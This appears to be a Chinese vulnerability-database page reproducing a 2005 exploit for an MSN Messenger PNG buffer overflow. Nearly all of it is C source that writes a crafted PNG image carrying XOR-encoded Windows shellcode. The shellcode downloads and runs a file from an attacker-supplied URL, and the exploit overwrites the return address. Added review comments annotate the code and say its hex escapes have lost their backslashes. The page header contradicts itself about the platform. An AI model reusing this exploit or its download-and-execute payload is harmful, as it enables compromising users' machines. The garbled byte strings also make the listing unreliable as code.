MSN Messenger (Linux) – ‘.png’ Image Buffer Overflow


漏洞ID 1054891 漏洞类型
发布时间 2005-02-09 更新时间 2005-02-09
CVE编号 N/A
CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/804
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
*
* Remember g++ k /str0ke
*
*/

/*
*
* MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit
* Bug discovered by Core Security Technologies  (www.coresecurity.com)
* Exploit coded By ATmaCA
* Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.
* Web: http://www.atmacasoft.com
* E-Mail: [email protected]
* Credit to kozan and delikon
* Now compiles under Linux thanks to dgr
* Usage:exploit <OutputPath> <Url>
*
*/

/*
*
* Tested with MSN Messenger 6.2.0137
* This vulnerability can be exploited on Windows 2000 (all service packs)
* and Windows XP (all service packs) that run vulnerable
* clients of MSN Messenger.
*
*/

/*
*
* After creating vuln png image, open
* MSN Messenger and select it as your display picture in
* "Tools->Change Display Picture".
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>


#ifdef __BORLANDC__
         #include <mem.h>
         #include <conio.h>
#endif

/* Single-byte x86 NOP (0x90) used as filler between the sections main() writes. */
#define NOP 0x90

/* Leading bytes of the output file.  The values spell the PNG signature,
   an IHDR chunk and the start of a tRNS chunk.  main() writes
   sizeof(png_header)-1 bytes, i.e. everything except the string terminator.
   NOTE(review): as reproduced on this page the hex escapes in every literal
   below appear to have lost their backslashes, so each "xNN" reads as three
   ASCII characters rather than one byte; treat the listing as a transcription,
   not as the compilable original. */
char png_header[] =
"x89x50x4Ex47x0Dx0Ax1Ax0Ax00x00x00x0Dx49x48x44x52"
"x00x00x00x40x00x00x00x40x08x03x00x00x00x9DxB7x81"
"xECx00x00x01xB9x74x52x4Ex53";

/* Trailing bytes appended at the very end of the output, again written
   without the terminating NUL (sizeof(pngeof)-1 bytes). */
char pngeof[] = "x90x90x90x59xE8x47xFExFFxFF";

/* Generic win32 http download shellcode
   xored with 0x1d by delikon (http://delikon.de/) */
/* Stored as a string literal, so sizeof(shellcode) counts the terminating NUL.
   main() searches this array for the marker bytes "x22xff", overwrites the two
   bytes at that position with a value derived from the URL length, and then
   appends the XOR-encoded URL after a copy of the whole array.  The same
   0x1d key is applied to the URL by Sifrele(). */
char shellcode[] = "xEB"
"x10x58x31xC9x66x81xE9x22xFFx80x30x1Dx40xE2xFAxEBx05xE8xEBxFF"
"xFFxFFxF4xD1x1Dx1Dx1Dx42xF5x4Bx1Dx1Dx1Dx94xDEx4Dx75x93x53x13"
"xF1xF5x7Dx1Dx1Dx1Dx2CxD4x7BxA4x72x73x4Cx75x68x6Fx71x70x49xE2"
"xCDx4Dx75x2Bx07x32x6DxF5x5Bx1Dx1Dx1Dx2CxD4x4Cx4Cx90x2Ax4Bx90"
"x6Ax15x4Bx4CxE2xCDx4Ex75x85xE3x97x13xF5x30x1Dx1Dx1Dx4Cx4AxE2"
"xCDx2CxD4x54xFFxE3x4Ex75x63xC5xFFx6ExF5x04x1Dx1Dx1DxE2xCDx48"
"x4Bx79xBCx2Dx1Dx1Dx1Dx96x5Dx11x96x6Dx01xB0x96x75x15x94xF5x43"
"x40xDEx4Ex48x4Bx4Ax96x71x39x05x96x58x21x96x49x18x65x1CxF7x96"
"x57x05x96x47x3Dx1CxF6xFEx28x54x96x29x96x1CxF3x2CxE2xE1x2CxDD"
"xB1x25xFDx69x1AxDCxD2x10x1CxDAxF6xEFx26x61x39x09x68xFCx96x47"
"x39x1CxF6x7Bx96x11x56x96x47x01x1CxF6x96x19x96x1CxF5xF4x1Fx1D"
"x1Dx1Dx2CxDDx94xF7x42x43x40x46xDExF5x32xE2xE2xE2x70x75x75x33"
"x78x65x78x1D";

/* File-scope state shared by Sifrele() and main(). */
FILE           *di;            /* output stream opened on argv[1] in "wb" mode */
int            i = 0;          /* loop counter; NOTE(review): shared by every loop in the
                                  file and by Sifrele(), so a call clobbers the caller's index */
short int      weblength;      /* 16-bit value written over the "x22xff" marker in shellcode */
char           *web;           /* points at argv[2], the URL; modified in place by Sifrele() */
char           *pointer = NULL;/* position of the marker inside shellcode (strstr result) */
char           *newshellcode;  /* heap buffer: shellcode + encoded URL + one 0x1d byte */

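/*xor cryptor*/
/*
 * Sifrele - XOR every byte of the NUL-terminated string Name1 in place with
 * the single-byte key 0x1d and return Name1 itself.  No copy is made: the
 * caller's buffer is modified.  Applying it twice restores the original text.
 *
 * Name1 must be a valid NUL-terminated string (strlen on NULL is undefined).
 *
 * The loop index is local: the previous version iterated with the file-scope
 * counter `i`, so each call silently overwrote whatever value main() had left
 * there.  The count is kept in size_t to match strlen() instead of an int.
 */
char *Sifrele(char *Name1)
{
        const char key = 0x1d;
        size_t len = strlen(Name1);
        for (size_t k = 0; k < len; k++)
                Name1[k] ^= key;
        return Name1;
}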


/*
 * Entry point.  Usage: exploit <OutputPath> <Url>.
 * Writes the crafted file to argv[1] and embeds argv[2] (the URL) into it.
 *
 * Bytes are written in this order:
 *   1. png_header, without its string terminator
 *   2. 99 NOP bytes
 *   3. shellcode, then the XOR-encoded URL, then a single 0x1d byte
 *   4. (83 - strlen(url)) further NOP bytes
 *   5. the four bytes 47 05 5e 00 (see the comment at that point)
 *   6. pngeof, without its string terminator
 *
 * Returns 0 on a usage error or when the output file cannot be opened, and 1
 * after a successful write -- the opposite of the usual exit-status convention.
 *
 * NOTE(review): `new char[...]` is C++, not C, which is presumably why the
 * header comment asks for g++.  All loops use the file-scope counter `i`.
 */
int main(int argc, char *argv[])
{

        if (argc < 3)
        {
                printf("MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploitn");
                printf("Bug discoveried by Core Security Technologies  (www.coresecurity.com)n");
                printf("Exploit coded By ATmaCAn");
                printf("Copyright ©2002-2005 AtmacaSoft Inc. All Rights Reserved.n");
                printf("Web: http://www.atmacasoft.comn");
                printf("E-Mail: [email protected]");
                printf("Credit to kozan and delikonnn");
                printf("tUsage:exploit <OutputPath> <Url>n");
                printf("tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exen");

                return 0;
        }


	web = argv[2];


        /* Binary mode so no newline translation happens on Windows. */
        if( (di=fopen(argv[1],"wb")) == NULL )
        {
                printf("Error opening file!n");
                return 0;
        }
        for(i=0;i<sizeof(png_header)-1;i++)
                fputc(png_header[i],di);

        /*stuff in a couple of NOPs*/
        for(i=0;i<99;i++)
                fputc(NOP,di);

        /* 16-bit value derived from the URL length; copied over the marker
           bytes inside shellcode in host byte order.
           NOTE(review): the strstr() result is not checked for NULL before
           the memcpy below. */
        weblength=(short int)0xff22;
        pointer=strstr(shellcode,"x22xff");
	weblength-=strlen(web)+1;
        memcpy(pointer,&weblength,2);
        /* Buffer for shellcode + encoded URL + trailing byte + NUL.
           NOTE(review): never freed; released only at process exit. */
        newshellcode = new char[sizeof(shellcode)+strlen(web)+1];
        strcpy(newshellcode,shellcode);
        strcat(newshellcode,Sifrele(web));   /* web is encoded in place */
        strcat(newshellcode,"x1d");

        //shell code
        for(i=0;i<strlen(newshellcode);i++)
                fputc(newshellcode[i],di);


        /* NOTE(review): 83 - strlen(web) is unsigned arithmetic, so a URL
           longer than 83 bytes wraps to a huge count and the loop keeps
           writing NOPs. */
        for(i=0;i<(83-strlen(web));i++) //NOPs
                fputc(NOP,di);

	/*Overwriting the return address (EIP)*/
        /*0x005E0547 - ret */
        /* Written least-significant byte first. */
        fputc(0x47,di);
        fputc(0x05,di);
        fputc(0x5e,di);
        fputc(0x00,di);

        for(i=0;i<sizeof(pngeof)-1;i++)
                fputc(pngeof[i],di);

        printf("Vulnarable png file %s has been generated!n",argv[1]);

        /* NOTE(review): the fclose() return value is not checked, so a failed
           flush of the buffered output goes unreported. */
        fclose(di);

	return 1;
}

// milw0rm.com [2005-02-09]
